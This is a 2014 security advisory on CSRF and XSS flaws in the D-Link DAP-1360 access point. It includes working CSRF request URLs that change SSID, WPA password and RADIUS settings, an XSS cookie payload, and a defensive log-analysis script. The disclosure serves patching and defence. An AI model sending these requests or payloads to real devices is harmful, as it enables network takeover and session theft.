SECURITYVULNS:DOC:31476
Dec 02, 2014

CSRF and XSS vulnerabilities in D-Link DAP-1360

vulners.com

Hello 3APA3A!

There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

These are in addition to the Abuse of Functionality, Brute Force, Information Leakage, Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in DAP-1360 that I wrote about earlier.


Affected products:

The vulnerable model is D-Link DAP-1360, firmware 1.0.0. This model with other firmware versions must also be vulnerable.

D-Link will fix these vulnerabilities in the next version of the firmware, as they answered me in October. But in November they answered that the firmware still had not been publicly released due to bugs and that they needed to work on it. D-Link has also delayed fixing vulnerabilities in DCS-2103 (some of which I already disclosed recently, and there are many other holes about which I informed them). I found this and other web cameras during the summer while watching terrorists' activities in the Donetsk and Lugansk regions of Ukraine. Read about my video and audio reconnaissance (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html).

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's an EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes fixes for the vulnerabilities.


Details:

CSRF (WASC-09):

In the section Wi-Fi - Basic settings it's possible to change these parameters: Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

In the section Wi-Fi - Security settings it's possible to change these parameters: Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (when WPA2 is selected), WPA Encryption, WPA renewal, and also some parameters, such as RADIUS_Server, RADIUS_Port and RADIUS_Key, which are not present in the GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

With this request all the above-mentioned parameters are changed, including the password of the Access Point.
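A defender's log check for the two CSRF requests above, added here as an example (it is not the advisory's or D-Link's code): it parses constructed web-server access-log lines, percent-decodes the res_buf JSON, and reports which sensitive Wi-Fi parameters a write request (res_config_action=3 to config id 35 or 36) would change, flagging requests whose Referer is not the device's own origin. The log format, the client address, the device address and the Referer-based heuristic are assumptions.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Config ids and JSON keys come from the advisory's PoC requests: 35 is Wi-Fi "Basic settings", 36 "Security settings".
SENSITIVE_SECTIONS = {"35": "Wi-Fi basic settings", "36": "Wi-Fi security settings"}
SENSITIVE_KEYS = {"HideSSID", "CountryCode", "Channel", "AuthMode", "WPAPSK",
                  "EncrypType", "RADIUS_Server", "RADIUS_Port", "RADIUS_Key"}
DEVICE_ORIGIN = "http://192.168.0.50/"  # device address used in the advisory's PoC (assumption)

# Constructed combined-format access-log lines (last quoted field is the Referer); not real traffic.
# Line 2 only reads the section (res_config_action=1) and must not be flagged.
SAMPLE_LOG = """\
192.168.0.23 - - [02/Dec/2014:10:00:01 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22PLACEHOLDER%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22PLACEHOLDER%22} HTTP/1.1" 200 17 "http://evil.example/"
192.168.0.23 - - [02/Dec/2014:10:00:05 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=1&res_config_id=36 HTTP/1.1" 200 311 "http://192.168.0.50/index.cgi"
192.168.0.23 - - [02/Dec/2014:10:01:10 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%22lab%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22} HTTP/1.1" 200 17 "http://192.168.0.50/index.cgi"
"""

def _keys(obj):
    """Yield every key in the res_buf JSON, descending into the nested mbssid list."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key
            yield from _keys(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from _keys(item)

def flag_config_changes(log_text):
    """One finding per write (res_config_action=3) to a sensitive Wi-Fi section; a
    Referer that is absent or not the device's own origin marks a likely CSRF."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split('"')
        if len(fields) < 4 or not fields[1].startswith("GET "):
            continue
        url = urlsplit(fields[1].split(" ")[1])
        params = parse_qs(url.query)  # also percent-decodes the res_buf JSON
        section = SENSITIVE_SECTIONS.get(params.get("res_config_id", [""])[0])
        if url.path != "/index.cgi" or not section \
                or params.get("res_config_action", [""])[0] != "3":
            continue
        try:
            buf = json.loads(params.get("res_buf", ["{}"])[0])
        except json.JSONDecodeError:
            buf = {}  # malformed buffer: still report the write, with an empty key list
        findings.append({"client": fields[0].split(" ")[0], "section": section,
                         "changed": sorted(set(_keys(buf)) & SENSITIVE_KEYS),
                         "likely_csrf": not fields[3].startswith(DEVICE_ORIGIN)})
    return findings
```

Browsers may omit the Referer entirely, so a missing header is treated as suspicious rather than benign.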

XSS (WASC-08):

Insert <script>alert(document.cookie)</script> into Quick search. This is Strictly Social XSS.


Timeline:

2014.05.22 - informed the developer about multiple vulnerabilities.
2014.06.28 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.29 - disclosed at my site (http://websecurity.com.ua/7234/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua